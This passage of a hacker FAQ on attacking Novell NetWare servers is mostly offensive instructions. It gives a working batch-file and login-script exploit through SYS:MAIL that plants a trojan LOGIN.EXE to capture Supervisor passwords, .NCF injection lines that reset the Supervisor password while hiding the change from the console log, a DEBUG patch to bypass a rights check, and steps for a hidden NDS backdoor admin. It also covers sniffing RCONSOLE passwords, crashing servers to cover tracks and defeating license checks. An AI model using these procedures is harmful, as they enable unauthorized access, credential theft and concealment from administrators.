3.11: - Use pconsole to down the print server. This causes the monitor screen to go to the print server screen and wait for you to press enter to exit the screen. At the same time it puts the monitor screen in the background. - Switch to the console screen and type UNLOAD MONITOR. - Check the AUTOEXEC.NCF for the PSERVER.NLM load line and manually reload the PSERVER.NLM. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 05 File and Directory Access --------------------------------------------------------------------------- 05-1. How can I see hidden files and directories? Instead of a normal DIR command, use NDIR to see hidden files and directories. NDIR *.* /S /H will show you just Hidden and System files. --------------------------------------------------------------------------- 05-2. How do I defeat the execute-only flag? If a file is flagged as execute-only, it can still be opened. Open the file with a program that will read in executables, and do a Save As to another location. Also try X-AWAY.EXE to remove this flag since Novell's FLAG.EXE won't. But once again X-AWAY.EXE requires Supervisor access. To disable the check for Supe access in X-AWAY, try the following: REN X-AWAY.EXE WORK DEBUG WORK EB84 EB W Q REN WORK X-AWAY.EXE Hey presto, anybody can copy X flagged files. The only catch is you need practically full rights in the directory where the X flagged file resides. --------------------------------------------------------------------------- 05-3. How can I hide my presence after altering files? The best way is to use Filer. Here are the steps for removing file alterations - - Run Filer or use NDIR and note the attributes of the target file, namely the date and owner of the file. - Make your changes or access the file. - Run Filer or use NDIR and check to see if the attributes have changed. If so, change them back to the original settings. While you can hit F1 will in Filer and get all the context-sensitive help you need, the quicky way to get where you're going is to run Filer in the target file's directory, select Directory Contents, highlight the target file and hit enter, select File Options and then View/Set File Information. View and edit to your heart's desire. --------------------------------------------------------------------------- 05-4. What is a Netware-aware trojan? A Netware-aware trojan is a program that supposedly does one thing but does another instead, and does it using Netware API calls. I have never personally encountered one, but here is how they would work. - Trojan program is placed on a workstation, hopefully on one frequented by admins with Supe rights. The trojan program could be named something like CHKVOL.COM or VOLINFO.COM, that is a real name but with a .COM extension. They would be placed in the workstation's path. - Once executed, the trojan uses API calls to determine if the person is logged in as a Supe equivalent, if not it goes to the next step. Otherwise some type of action to breach security is performed. - The real CHKVOL.EXE or VOLINFO.EXE is ran. The breach of security would typically be some type of command-line activity that could be performed by system() calls. For example, PROP.EXE could be run to build a property and the replacement LOGIN.EXE copied up to the server in the SYS:LOGIN directory. Or RW access granted to the SYS:SYSTEM directory for a non-Supe user like GUEST. Once activated the trojan could also erase itself since it is no longer needed. --------------------------------------------------------------------------- 05-5. What are Trustee Directory Assignments? The LAN God has pointed out quite correctly that Trustee Directory Assignments are the most misunderstood and misconfigured portion of Novell Netware. Typically a secure site should have Read and File Scan only in most directories, and should not have any rights on the root directory of any volume. Rights assigned via the Trustee Directory Assignments filter down the directory tree, so if a user has Write access at the root directory, that user has Write access in every subdirectory below it (unless explicitly limited in a subdirectory down stream). And these assignments are not located in the bindery, but on each volume. The following is a brief description of Trustees and Trustee Directory Assignments cut and pasted from the comp.os.netware.security FAQ: [quote] A trustee is any user or group that has been granted access rights in a directory. The access rights in Novell NetWare 2 are slightly different from the ones in NetWare 3. The following is a summary of access rights for NetWare 3. S - Supervisory. Any user with supervisory rights in a directory will automatically inherit all other rights, regardless of whether they have been explicitly granted or not. Supervisor equivalent accounts will hold this access right in every directory. R - Read. Enables users to read files. C - Create. Enables users to create files and directories. Unless they also have write access, they will not be able to edit files which have been created. W - Write. Enables users to make changes to files. Unless they also have create access, they may not be able to edit files, since the write operation can only be used to extend files (not truncate them, which file editors need to do). E - Erase. Enable users to erase files and remove directories. M - Modify. Enable users to modify file attributes. F - File scan. Enables users to see file and directory information. If a user does not have file scan rights, they will not see any evidence of such files existing. A - Access control. Enable user to change trustee rights. They will be able to add other users as trustees, remove trustees, and grant/revoke specific rights from users. The only caveat of access control is that it is possible for users to remove themselves (as trustees) from directories, thus losing all access control. In addition to trustees and access rights, there is a concept of inherited rights which means that users inherit rights from parent directories. For example, if user ALICE has rights [CWEM] in a directory, and she has [RF] rights in the parent directory then she will have [RCWEMF] rights as a result of the inherited rights. This will only work if one of the rights that ALICE has in the two directories is granted to a group; if both are granted to her, she will lose the rights of the parent. [end quote] --------------------------------------------------------------------------- 05-6. Are there any default Trustee Assignments that can be exploited? Yes. In 3.x the group EVERYONE has Create rights in SYS:MAIL. This means the user (including GUEST) has the ability to write files to any subdirectory in SYS:MAIL. The first versions of Netware included a simple e-mail package, and every user that is created gets a subdirectory in mail with RCWEMF, named after their object ID number. One consistent number is the number 1, which is always assigned to Supervisor. Here's one way to exploit it: - Login as GUEST and change to the SYS:MAIL subdirectory. - Type DIR. You will see one subdirectory, the one owned by GUEST. Change into that directory (ex. here is C0003043) - Type DIR. If there is no file named LOGIN, you can bet there may not be one for Supervisor. If there is a default-looking LOGIN file, even a zero length file, you cannot proceed. - Copy PROP.EXE and LOGIN.EXE (the itsme version) to SYS:MAIL\C0003043 - Create a batch file (ex. here is BOMB.BAT) with the following entries: @ECHO OFF FLAG \LOGIN\LOGIN.EXE N > NUL
COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL
FLAG \LOGIN\LOGIN.EXE SRO > NUL
\MAIL\C0003043\PROP -C > NUL

– Create a LOGIN file with the following entries:

MAP DISPLAY OFF
MAP ERRORS OFF
MAP G:=SYS:
DRIVE G:
COMMAND /C #\MAIL\1\BOMB
DRIVE F:
MAP DELETE G:

– Now copy the files to the Supervisor’s SYS:MAIL directory from a drive
mapped to the SYS: volume.

TYPE BOMB.BAT > \MAIL\1\BOMB.BAT
TYPE LOGIN > \MAIL\1\LOGIN

– The next time the Supervisor logs in the LOGIN.EXE is replaced and the
PROP.EXE file is run, capturing passwords. Run PROP.EXE later to get the
passwords, and then once you have all the passwords you need (including
Supervisor) delete your LOGIN and BOMB.BAT file.

Admins can defeat this by creating default personal Login Scripts or by
adding an EXIT command to the end of the System Login Script. Later versions
of Netware create a zero-length LOGIN file at ID creation time in the
SYS:MAIL directories to defeat this.

—————————————————————————

05-7. What are some general ways to exploit Trustee Rights?

To find out all your trustee rights, use the WHOAMI /R command. The
following section is a summary of what rights to expect, and the purpose.
Where x appears, it means it doesn’t matter if the right is set.

[SRWCEMFA] means you have FULL rights. They are all eight of the effective
rights flags.

[Sxxxxxxx] shouldn’t appear unless you are supervisor (or equivalent).
It means you have full access in that directory and all subdirectories.
You cannot be excluded from any directory, even if a user explicitly
tries to revoke your access in a subdirectory.

[xxxxxxxA] is next best thing to the S right. It means you have access
control in that directory and all subdirectories. You can have your
access control (along with any other rights) revoked in a subdirectory,
but you can always use inherited rights to recover them (see the
c.o.n.s FAQ).

[ R F ] is what users should have in directories containing software.
You have the right to read files only.

[ RCWEMFx] is what users should have in their home directory. You can read,
create, and edit files. If you find any unusual directories with
these rights, they can also be used for storing files (maybe an abuse
of the network, especially if this is exploited to avoid quota
systems).

[ RxW F ] usually means that the directory is used for keeping log files.
Unless you have the C right, it may not be possible to edit files in
this directory.

The RIGHTS commands tells you what rights you have in a particular directory.
GRANT, REVOKE, and REMOVE are used to set trustee rights.

—————————————————————————

05-8. Can access to .NCF files help me?

Access to any .NCF file can bypass security, as these files are traditionally
run from the console and assume the security access of the console. The
addition of a few lines to any .NCF file can get you access to that system.

The most vulnerable file would be the AUTOEXEC.NCF file. Adding a couple of
lines to run BURGLAR.NLM or SETPWD.NLM would certainly get you access. But
remember there are other .NCF files that can be used and exploited. For
example, ASTART.NCF and ASTOP.NCF are used to start and stop Arcserve, the
most popular backup system for Netware. The LDREMOTE.NCF as mentioned in
section 04-2 is another potential target.

The lines you might add to such a file might be as follows:

UNLOAD CONLOG
LOAD SETPWD SUPERVISOR SECRET
CLS
LOAD CONLOG

This assumes you had read/write access to the location of the .NCF file
and can copy SETPWD.NLM to the server. Note that by unloading CONLOG you
are only partially covering your tracks, in the CONSOLE.LOG file it will
be obvious that CONLOG was unloaded and reloaded. The CLS is to keep your
activities off of the server’s screen.

The best .NCF for this is obviously one that is either used during the
server’s boot process or during some automated process. This way a short
.NCF and its activities may escape the eyes of an admin during execution.

—————————————————————————
—————————————————————————

Section 06

Fun with Netware 4.1

—————————————————————————

06-1. What is interesting about Netware 4.x’s licensing?

It is possible to load multiple licenses and combine their total number of
users. For example, if you are in one of those Novell CNE classes where they
give you a 2 user 4.1 license, you can get everyone’s CD in class and combine
them on one server. If you get 10 CDs you have a 20 user license. I know of no
limit to the maximum number of licenses and user limit, except for hardware
limitations supporting it. This means you could load more than one copy of
1000 user Netware 4.1 on a server (assuming you have unique copies, not the
same copy twice).

itsme has done some poking around with his tools, and has the following to say
regarding the SERVER.EXE that comes with Netware 4:

what’s inside server.exe:
0001d7c7 server.nlm type=07
000d319d “Link” 000d504a
000d31a5 unicode.nlm type=00 (ordinary NLM)
000d504a “Link” 000d6e9c
000d5052 dsloader.nlm type=00 (ordinary NLM)
000d6e9c “Link” 000db808
000d6ea4 timesync.nlm type=00 (ordinary NLM)
000db808 polimgr.nlm type=0c (‘hidden’ NLM)
by editing the binary of server, and changing the type of polimgr.nlm
from 0c to 00 (offset 007a or 000db882 in server.exe)
it becomes unhidden.
hidden NLM’s are protected from debugging with the netware debugger.

polimgr.nlm manages the license files, after it reads the file,
it checks with somekind of signature function whether it is a valid file
the function doing the checking can be made to always return OK, then
you can create an any number of users license.

—————————————————————————

06-2. How can I tell if something is being Audited?

Use RCONSOLE and do a directory scan of SYS:_NETWARE. There will be some
binary files named NET$AUDT.* if Auditing has been used. Old Audit files will
be named NET$AUDT.AO0, .AO1, etc. A current Auditing file will be named
NET$AUDT.CAF. If these files do not exist, no Auditing is being or has been
done. To check to see if Auditing is currently active, try to open the
current Auditing file like this:

LOAD EDIT SYS:_NETWARE\NET$AUDT.CAF

If it pulls up something (with a little garbage) then Auditing is currently
turned off. If you get an error stating that NET$AUDT.CAF doesn’t exist and
do you wish to create it, that means the file is being hend open and
Auditing is currently active on SOMETHING (remember, the EDIT.NLM normally
handles open files pretty well, but trying to open a file already open in
SYS:_NETWARE always gets this error).

—————————————————————————

06-3. Where are the Login Scripts stored and can I edit them?

The Login Scripts are stored in, you guessed it, SYS:_NETWARE. Unlike the
binary files used in NDS, these files are completely editable by using
EDIT.NLM. Doing an RCONSOLE directory scan in SYS:_NETWARE will turn up
files with extensions like .000, these are probably Login Scripts. Pull up
a few, they are plain text files. For example, you found 00021440.000:

LOAD EDIT SYS:_NETWARE\00021440.000

If it is a Login Script, you will see it in plain english and you can
certainly edit and save it. This completely bypasses NDS security, and is the
main weakness. You can use this to grant a user extra rights that can lead to
a number of compromises, including full access to the file system of any
server in the tree.

—————————————————————————

06-4. What is the rumored “backdoor” in NDS?

The rumored backdoor in NDS exists – to an extent. The rumor is that there
is a way to set up a backdoor into a system in NDS that is completely
hidden from everyone and everything. There IS a way to get real close to
this, although how “hidden” it is remains to be seen. One catch – you need
full access to NDS i.e. Admin access to set it up. But if you can get Admin’s
password or access to a user with Admin or equivalent access then you can
put in a backdoor that may go unnoticed for months, or perhaps never be
discovered. Here’s how to set it up:

– Get logged in as Admin or equivalent.
– In NWADMIN highlight an existing container.
– Create a new container inside this container.
– Create a user inside this new container. No home directory.
– Give this user full Trustee Rights to their own user object.
– Give this user full Trustee Rights to the new container.
– Make this user security equivalent to Admin.
– Modify the ACL for the new user so they can’t be seen.
– Adjust the Inherit Rights Filter on the new container so no one can
see it.

Now this technique can be used by the paranoid admin that wants to give
another user full access to a container, and this user wants to restrict
access to this container. To prevent this user from forgetting their
password (and making a section of the tree unmanageable or worse, disappear)
an admin will use similiar techniques.

I have not been able to fully test this but it looks completely invisible to
the average LAN admin. This does require an above average knowledge of NDS to
set up, so most administrators will not even know how to look for this user.

Let’s say you installed your backdoor at the XYZ Company, put your container
inside the MIS container and called it BADBOY. Your backdoor is named
BACKDOOR. Login like this:

LOGIN .BACKDOOR.BADBOY.MIS.XYZ

Now you will show up in the normal tools that show active connections on a
server, so naming your backdoor “BACKDOOR” is probably not a great idea.
Think of a name that might look like an automated attachment, and only use it
when you think you won’t be noticed.

If the site has Kane Security Analyst, they can find the backdoor.

—————————————————————————

06-5. How can I remove NDS?

This one is dangerous. This one will get you your Admin account back if you
lost the password, and is not for the light-hearted if you plan on actually
using NDS afterwards. Do this at a 4.1 console:

LOAD INSTALL -DSREMOVE

Now in the INSTALL module, go ahead and try to remove NDS. As a part of the
process, it will ask you for the Admin password, get this, JUST MAKE ONE UP.
If you get errors, no problem. Keep going and you can remove NDS from the
server. Even though you gave it the wrong password, it will still let you
remove NDS. I told you this one is real wicked…

—————————————————————————

06-6. How can I remove Auditing if I lost the Audit password?

If the Auditor forgets the password, try a simple wipe and reload. Hello,
hello, you seemed to have fainted…

You can try this although there is no guarantee it will work, it is just a
theory. You see, the Auditing files are located in SYS:_NETWARE. As long as
they are there and Auditing active, even deleting NDS and recreating it will
not turn off Auditing. If you wish you can delete and rebuild SYS: which
will get it. Try these listed items if you are desperate. I have tried them
in the Nomad Mobile Reseach Centre lab and got this to work a couple of times
— but once I trashed the server and NDS. One time it didn’t work at all. But
here it is:

– Use RCONSOLE’s directory scan and get the exact names of the Audit
files, you know NET$AUDT.CAF but also files with an extension of .$AF
are Auditing files, too.
– Use the techniques in 06-2 and determine exactly which files are
being held open by this particular server for Auditing.
– Try booting up the server and running a sector editor.
– Search the drive for the file names you found.
– Change all occurrences of these names, save changes, and boot up.
– If that didn’t do the trick, try booting up the server using a 3.x
SERVER.EXE and try and get to SYS:_NETWARE that way. Then delete the
Auditing files.
– If THAT doesn’t work, use repeated calls to the SYS:_NETWARE’s
directory table (using the APIs) and either delete or change the
afore mentioned files.

Gee, maybe a “simple wipe and reload” is easier…

—————————————————————————

06-7. Does 4.x store the LOGIN password to a temporary file?

Yes and no. No to 4.02 or higher. Here’s the scoop on 4.0.

The version of LOGIN.EXE that shipped with 4.0 had a flaw that under the
right conditions the account and password could be written to a swap file
created by LOGIN.EXE. Once this occured, the file could be unerased and the
account and password retrieved in plain text.

—————————————————————————

06-8. Everyone can make themselves equivalent to anyone including Admin. How?

A couple of things might cause this. One, I’d check the rights for [PUBLIC],
and secondly I’d check the USER_TEMPLATE id for excessive rights. The Write
right to the ACL will allow you to do some interesting things, including
making yourself Admin equivalent. For gaining equivalence to most anything
else you need only Read and Compare.

The implication should be obvious, but I’ll spell it out anyway. A backdoor
can be made if an account is set up this way. Let’s say you’ve created an
account called TEST that has enough rights to do this kind of thing. Simply
go in as the TEST account, make yourself Admin equivalent, do your thing,
remove the Admin equivalent, and get the hell out. Neat and sweet.

—————————————————————————

06-9. Can I reset an NDS password with just limited rights?

There is a freeware utility called N4PASS, that is meant for Netware 4.10
(uses NDS calls and is not bindery based). The intention of this package is
to enable a Help Desk to reset passwords for users without granting them
tons of rights. It uses full logging and does not require massive ACL
manipulation to do it.

Obviously being set up to use this utility opens a few doors. The filename
is N4PA11.EXE on Netwire in Compuserve, and should be on one of Novell’s
mirror sites soon.

You can reach the author at dcollins@fastlane.net

A couple of interesting things about this utility — if configured
incorrectly the server may be compromised in a number of ways. For instance,
the password generated is stored in a temp file. If the directory for
N4PASS is not set to purge immediately, the file is salvagable. Also, if
the rights to the N4PASS directory are too open, you can discover the default
password, among other things. The text file included with the utility
covers this, so read it carefully if you are installing it. If you are
hacking, read it carefully too 😉

—————————————————————————

06-10. What is OS2NT.NLM?

OS2NT.NLM is a Novell-supplied NLM for recovering/fixing Admin, like after
it becomes an Unknown object, as opposed to User — especially after a
DSREPAIR. This module is considered a “last resort” NLM and you must contact
Novell to use it. While I haven’t seen it, it is supposed to be on one of
Novell’s FTP sites. It supposedly is customized by Novell to work with
your serial number and is a one-time use NLM. You have to prove to Novell
who you are and that your copy of Netware is registered.

I would suspected it is possible that this NLM could be hacked to get
around the one-time use and serial number/password thing, but a restore
of NDS from a good backup would accomplish things better. This way is a
little destructive.

—————————————————————————

06-11. Do you have to be Admin equivalent to reset a password?

No. There is a freeware utility called N4PASS, that is meant for Netware
4.10 (uses NDS calls and is not bindery based).

The intent is for helpdesk staff to reset passwords for users without
setting up elaborate ACL settings for a group to control the password
property. It supposedly does this with full logging. I’m looking for info on
it, so let me know if you have tips on its use.

—————————————————————————
—————————————————————————

Section 07

Miscellaneous Info on Netware

—————————————————————————

07-1. Why can’t I get through the 3.x server to another network via TCP/IP?

Loading the TCPIP.NLM in a server with two cards does not mean that packets
will be forwarded from one card to another. For packet forwarding to work, the
AUTOEXEC.NCF file should have the line:

load tcpip forward=yes

For packets to go through the server, you must set up a “gateway=aa.bb.cc.dd”
option on the workstation. This leaves routing up to the server. If you are
writing hack tools, keep this in mind if they use IP. Some older routers may
not recognize the Netware server as a router, so you may not have many options
if your target is on the other side of one of these routers. Newer routers are
Netware aware and will “find” your server as a router through RIP.

Netware 3.11 IP will only forward between two different subnets. Proxy Arp is
currently not supported in Netware IP. Example:

123.45.6 & 123.45.7 with a mask of ff.ff.ff.00 will forward packets

123.45.6 & 231.45.7 with a mask of ff.ff.ff.00 will not

This way you do not waste precious time trying to cross an uncrossable river.
Some admins use this to limit the flow of IP traffic.

—————————————————————————

07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF?

For Netware 3.xx, use these command-line options:

SERVER -NS to skip STARTUP.NCF, and

SERVER -NA to skip AUTOEXEC.NCF

NetWare 2.x does not HAVE the files STARTUP.NCF and AUTOEXEC.NCF. Instead they
hard-code all the information into NET$OS.EXE, so you will have to rebuild it
to change anything.

—————————————————————————

07-3. How can I login without running the System Login Script?

Often an admin will try and prevent a user from getting to DOS or breaking
out of the System Login Script to “control” the user. Here’s to way to
prevent that –

– Use ATTACH instead of LOGIN to connect to a server. ATTACH will not run
the login script, whereas LOGIN will. ATTACH.EXE will either have to be
copied to a local HD or put in SYS:LOGIN.
– Use the /s option for LOGIN. Using “LOGIN /S NUL ” will
cause LOGIN to load the DOS device NUL which will always seem like an empty
file.

—————————————————————————

07-4. How do I remotely reboot a Netware 3.x file server?

If you have access to a server via RCONSOLE it may come in handy after
loading or unloading an NLM to reboot a server. Build an NCF file by
doing the following steps –

– Create a file called DOWNBOY.NCF on your local drive. It should be
a text file and contain the following lines:

REMOVE DOS
DOWN
EXIT

– Copy up the file to the SYS:SYSTEM directory using RCONSOLE.

– At the System Console prompt, type DOWNBOY and enter.

What happens is this – the REMOVE DOS statement frees up the DOS section
in server RAM, the server is downed (if there are open files, you will
be given one of those “are you sure” messages, answer Y for yes), and
the EXIT command tries to return the server console to DOS. But since
you removed DOS from RAM, the server is warm booted.

—————————————————————————

07-5. How can I abend a Netware server? And why?

I’ll answer the second question first. You may be testing your server as an
administrator and wish to see how you are recovering from crashes. Or you
may be a hacker and wish to cover your tracks VERY DRAMATICALLY. After all,
if you are editing log files and they are going to look funny when you are
done, a good crash might explain why things look so odd in the logs.

These are per itsme:

– Netware 4.1 : type 512 chars on the console + NENTER -> abend
– Netware 3.11 : NCP request 0x17-subfn 0xeb with a connection number higher
than the maximum allowed will crash the server (yes you will need the APIs)

—————————————————————————

07-6. What is Netware NFS and is it secure?

NFS (Networked File System) is used primarily in Unix to remotely mount a
different file system. Its primary purpose in Netware is to allow the
server to mount a Unix file system as a Netware volume, allowing Netware
users access to Unix data without running IP or logging into the server,
and Unix users to mount a Netware volume as a remote file system. If the
rights are set up incorrectly you can gain access to a server.

While the product works as described, it is a little hard to administer,
as user accounts on both sides must be in sync (name and password) and it
can be a fairly manual process to ensure that they are.

A reported problem with Netware NFS is that after unloading and reloading
using the .NCF files, a system mount from the Unix side includes SYS:ETC
read only access. If this directory can be looked at from the Unix side
after a mount, .NCF and .CFG files could be viewed and their information
exploited. For example, SYS:ETC is a possible location of LDREMOTE.NCF,
which could include the RCONSOLE password.

Netware NFS’ existence on a server says you have some Unix boxes around
somewhere, which may be of interest as another potential system to gain
access to.

—————————————————————————

07-7. Can sniffing packets help me break in?

Yes. If a user is logging in and the password is being transmitted to the server
unencrypted, it will show up as plain text in the trace. If the site uses telnet
and ftp, capturing those password will come in handy. Outside of gaining access
to another system, many users will make their passwords the same across all
systems.

For a list of DOS-based sniffers, see the alt.2600/#hack FAQ. I personally
prefer the Network General Sniffer 😉

RCONSOLE.EXE is the client-launched application that provides a remote
server console to a Novell Netware file server. The connection between client
and server allows administrators to manage servers as if they were at the
physical server console from their desks, and allow virtually any action
that would be performed at the server console to be performed remotely,
including execution of console commands, uploading of files to the server,
and the unloading and loading of Netware Loadable Modules (NLMs). It is not
only an effective tool for administrators, it is a prime target for hackers.

A critical point of access to many servers is the actual physical console.
This is one of the main reasons why physical security of the server is so
important and stressed by security conscious administrators. On many systems
you have a level of access with little to no security. Netware is no
exception.

The main reason to hack RCONSOLE is to gain access to the Netware server
console. No, you aren’t physically there, but the OS doesn’t know any
different. And the main reason to gain access to the Netware server console
is to utilize a tool to gain Supervisor access to the Netware server.

During the RCONSOLE process, the password does come across the wire encrypted.
If you look at the conversation you will see packets containing the
RCONSOLE.EXE being opened, the possible servers to be accessed, etc. This
conversation is nothing but NCP packets.

Once RCONSOLE is up on the workstation, the user chooses the server, hits enter,
and is prompted for a password. After entering the password, the conversation
contains two 60 byte IPX/SPX packets going back and forth followed by 4 NCP
packets, 64 bytes, 60 bytes, 64 bytes, and 310 bytes in length respectively.
The next IPX/SPX packet, 186 bytes in length, contains the password. It is
located at offset 3Ah, which is easy to find. Offset 38h is always FE and offset
39h is always FF.

Now comes the use of a tool called RCON.EXE from itsme that can take some of
the information you have collected and turn it into the password. What you
need are the first 8 hex bytes starting at offset 3Ah, the network address,
and the node address. Now the network and node address are in the header of
the packet that contains the encrypted password, but can also get these by
typing USERLIST /A which returns this info (and more) for each person
logged in.

Now why just the first 8 hex bytes? That’s all Novell uses. Great
encryption scheme, huh?

—————————————————————————

07-8. What else can sniffing get me?

Jeff Carr has pointed out that RCONSOLE sends screens in plaintext across
the network for all to see (well, all with sniffers). This means you can
see what is being typed in and what is happening on the screen. While it is
not the prettiest stuff to look at, occassional gems are available. Jeff’s
best gem? The RCONSOLE password. The server had been brought up without
REMOTE and RSPX being loaded, they were loaded by hand at the console after
the server was brought up. The first RCONSOLE session brought up the screen
with the lines LOAD REMOTE and LOAD RSPX PASSWORD (with PASSWORD being the
RCONSOLE password), and this was being sent to the RCONSOLE user’s
workstation in plaintext.

Teiwaz discovered that SYSCON sends password changes in plaintext. While
SETPASS, LOGIN, MAP, and ATTACH all encrypt the password in 3.x, SYSCON
does not.

—————————————————————————

07-9. How does password encryption work?

From itsme –

the password encryption works as follows:
1- the workstation requests a session key from the server
(NCP-17-17)
2- the server sends a unique 8 byte key to the workstation

3- the workstation encrypts the password with the userid,
– this 16 byte value is what is stored in the bindery on the server

4- the WS then encrypts this 16 byte value with the 8 byte session key
resulting in 8 bytes, which it sends to the server
(NCP-17-18 = login), (NCP-17-4a = verify pw) (NCP-17-4b = change pw)

5- the server performs the same encryption, and compares its own result
with that sent by the WS

-> the information contained in the net$*.old files which can be found
in the system directory after bindfix was run, is enough to login
to the server as any object. just skip step 3

—————————————————————————

07-10. Are there products to help improve Netware’s security?

While there are a number of products, commercial and shareware/public domain
that have some security-related features, the following products are either
really good or have some unique features.

There is a commercial product called SmartPass, which runs as an NLM. Once
installed, you can load this and analyze existing passwords for weaknesses.
A limited-time free demo can be obtained from the following address:

http://www.egsoftware.com/

SmartPass will check passwords on the fly, so a user can be forced to use a
non-dictionary word for a password.

Another commercial product product that will check from a dictionary word
list and simply report if the password is on the list is Bindview NCS. There
is a brand new NDS version of this product but I haven’t look at it yet.
The bindery version is god-awful slow, but completely accurate. It requires
Supe access to run. Bindview can also produce a number of reports. including
customized reports to give you all kinds of info on the server and its
contents. For more info on Bindview:

http://www.bindview.com/

For doing Auditing on a 3.x version of Netware, try AuditTrack. It will track
all access to a directory or individual file by user, which can come in handy
for seeing who is doing what. Out of the box Netware 3.11 has virtually no
way to track what an individual user is doing, but the AuditTrack NLM helps
greatly. E.G. Software, the developer, can be reached at:

http://www.egsoftware.com/

Intrusion Detection Systems puts out a commercial product called Kane
Security Analyst. It is considered by many to the “SATAN” of Netware. One
of its abilities is locating hidden objects in the NDS tree. For a good
demo, a 30 day trial version, and more info:

http://www.intrusion.com/

—————————————————————————

07-11. What is Packet Signature and how do I get around it?

Packet signatures works by using an intermediate step during the encrypted
password login call, to calculate a 64-bit signature. This block is never
transmitted over the wire, but it is used as the basis for a
cryptographically strong signature (“secure hash”) on the most important
part of each NCP packet exchange.

A signed packet can indeed be taken as proof sufficient that the packet came
from the claimed PC.

NCP Packet Signature is Novell’s answer to the work of the folks in the
Netherlands in hacking Netware. The idea behind it is to prevent forged
packets and unauthorized Supervisor access. It is an add-on option in 3.11,
but a part of the system with 3.12 and 4.x. Here are the signature levels
at the client and server:

Packet Signature Option and meaning:
0 = Don’t do packet signatures
1 = Do packet signatures if required
2 = Do packet signatures if you can but don’t if the other end doesn’t support
them
3 = Require packet signatures

You can set the same settings at the workstation server. The default for packet
signatures is 2 at the server and client. If you wish to use a tool like
HACK.EXE, try setting the signature level at 0 on the client by adding
Signature Level=0 in the client’s NET.CFG. If packet signatures are required
at the server you won’t even get logged in, but if you get logged in, hack away.

If you wish to change the signature level at the server, use a set command at
the server console:

SET NCP PACKET SIGNATURE OPTION=2

—————————————————————————

07-12. Do any Netware utilities have holes like Unix utilities?

This is a fairly common question, inspired by stack overrun errors,
sendmail bugs, and the like that exist in the Unix world. The reason you do
not have these kind of exploits in common Netware utilities is because:

– You use a proprietary shell that can be loaded without accessing the
server, therefore no shell exploits exist.
– Virtually all Netware utilities do NOT use stdin and stdout, so no stack
overruns that exploit anything.
– Since the shell is run locally, not on the server, you have no way to
use a utility to gain greater access than you have been granted, like a
SUID script in Unix.
– Yes there are utilities like HACK.EXE that grant extra access under
certain conditions in 3.11, but no Novell-produced utility comes close to
granting extra access.

—————————————————————————

—————————————————————————

Section 08

Resources

—————————————————————————

08-1. What are some Netware FTP locations?

These are from various FAQs. I have not checked all of these and I’m pretty
sure some may no longer be up. But here’s a starting point.

Novell’s ftp site:

ftp.novell.com 137.65.3.11
ftp.novell.de 193.97.1.1

Novell’s ftp Mirrors:

netlab2.usu.edu 129.123.1.44 (the best)
bnug.proteon.com 128.103.85.201
ftp.rug.nl /networks/novell 129.125.4.15
ftp.salford.ac.uk /novell 146.87.255.21
tui.lincoln.ac.nz /novell/novlib 138.75.90.4
novell.nrc.ca /netwire 132.246.160.4

Other Misc. Sites:

ml0.ucs.ed.ac.uk /guest/pc 129.215.112.49 (second best)
splicer2.cba.hawaii.edu /files/novell 128.171.17.2
/files/pegasus
cc.usu.edu /slip 129.123.1.1
/tcp-ip
risc.ua.edu /pub/network/novlib 130.160.4.7
/pub/network/pegasus
/pub/network/misc
/pub/network/tcpip
wuarchive.wustl.edu /etc/system/novell 128.252.135.4
nctuccca.edu.tw 192.83.166.10
ftp.uni-kl.de /pub/novell 131.246.94.94
dorm.rutgers.edu /pub/novell 128.6.21.20
netlab.usu.edu /novell 129.123.1.11
/netwatch
chaos.cc.ncsu.edu /pc/novell 152.1.10.23
/pc/utils
/pc/email
/pc/net
/pc/manage
dutiws.twi.tudelft.nl /pub/novell 130.161.156.11
jumper.mcc.ac.uk /pub/security/netware 130.88.202.26
sodapop.cc.LaTech.edu /pub/novell/specials 138.47.22.47
ftp.safe.net /pub/safetynet/ 199.171.27.2
ftp.best.com /pub/almcepud/hacks 206.86.8.2
ftp.efs.mq.edu.au /pub/novell 137.111.55.8
nic.switch.ch /mirror/novell 139.50.1.40
onyx.infonexus.com /pub/ToolsOfTheTrade/Netware
204.162.164.220
biomed.engr.LaTech.edu /sys/pub/ecl/specials 138.47.15.1

—————————————————————————

08-2. Can I get files without FTP?

Try using the BITFTP-FTP/Email gateway. Just send e-mail containing HELP as
the BODY (not a subject) to BITFTP@PUCC.BITNET. It will send more info to
you.

Internet gateways are:

ftpmail@decwrl.dec.com

ftpmail@cs.uow.edu.au

If you are on Compuserve, type GO NETWIRE to get to Novell’s forum. There are
files on there for downloading. Also try the CD NSEpro, which is most of the
Netwire forum put on CD.

—————————————————————————

08-3. What are some Netware WWW locations?

http://www.novell.com/ Novell in Provo
http://www.novell.de/ Novell in Europe
http://www.salford.ac.uk/ais/Network/Novell-Faq.html Novell@listserv.syr.edu
http://mft.ucs.ed.ac.uk/ Edinburg Tech Library*
http://resudox.net/bio/mainpage.html Great tools**
http://www.efs.mq.edu.au/novell/faq comp.sys.novell FAQ
http://occam.sjf.novell.com:8080 Online manuals
http://www.safe.net/safety Security Company
http://www.cis.ohio-state.edu/hypertext/faq/usenet/netware/security/faq.html
comp.os.netware.security FAQ

* Excellent site for tons of techie info. The Netware Server Management
section should be read be all hackers and admins alike.

** BioHazard has been busy collecting tools, a great site with assorted
nasties like keystroke capture programs, sniffers, and other security
compromising goodies. The bane of Sys Admins everywhere.

—————————————————————————

08-4. What are some Netware USENET groups?

Netware specific:

comp.os.netware.misc (main group, replaced comp.sys.novell)
comp.os.netware.announce (moderated announcements)
comp.os.netware.security (security issues)
comp.os.netware.connectivity (connect. issues incl. LAN Workplace)

Security, H/P in general:

alt.2600
alt.security
comp.security.announce
comp.security.misc

—————————————————————————

08-5. What are some Netware mailing lists?

* NOVELL@listserv.syr.edu – send an email with no subject to
listserv@listserv.syr.edu with “subscribe NOVELL Your Full Name” in the body.
You must reply to the message within two days or you’ll not be added to the
list. The same address no subject with “unsubscribe NOVELL” takes you off the
list.

* BIG-LAN@suvm.acs.syr.edu – send subscriptions to LISTSERV@suvm.acs.syr.edu.

* CUTCP-L@nstn.ns.ca for a discussion of Charon and CUTCP Telnet issues. Send
subscription requests to listserv@nstn.ns.ca.

* INFO-IBMPC@arl.army.mil – send subscription requests to
INFO-IBMPC-REQUEST@arl.army.mil.

* PMAIL@ua1vm.ua.edu for discussion of Pegasus Mail. The author, David Harris,
is active on this list. Send subscription and other administrative requests to
listserv@ua1vm.ua.edu.

